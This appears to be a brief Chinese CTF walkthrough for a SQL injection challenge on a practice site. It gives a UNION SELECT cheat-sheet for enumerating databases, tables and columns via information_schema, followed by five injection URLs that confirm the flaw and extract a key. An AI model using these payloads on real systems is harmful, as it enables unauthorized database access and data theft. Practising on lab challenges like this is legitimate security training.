知识点:查询库名:union select 1,schema_name from information_schema.schemata
查询表名:union select 1,table_name from information_schema.tables where table_schema='库名'
查询字段名:union select 1,column_name from information_schema.columns where table_name='表名'
查询信息:union select 1,名字 from 字段名
1.http://ctf5.shiyanbar.com/8/index.php?id=1 and 1 = 1
没变,说明存在注入漏洞
2.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,schema_name from information_schema.schemata
3.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,table_name from information_schema.tables where table_schema='my_db'
4.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,column_name from information_schema.columns where table_name='thiskey'
5.http://ctf5.shiyanbar.com/8/index.php?id=1 union select 1,k0y from thiskey
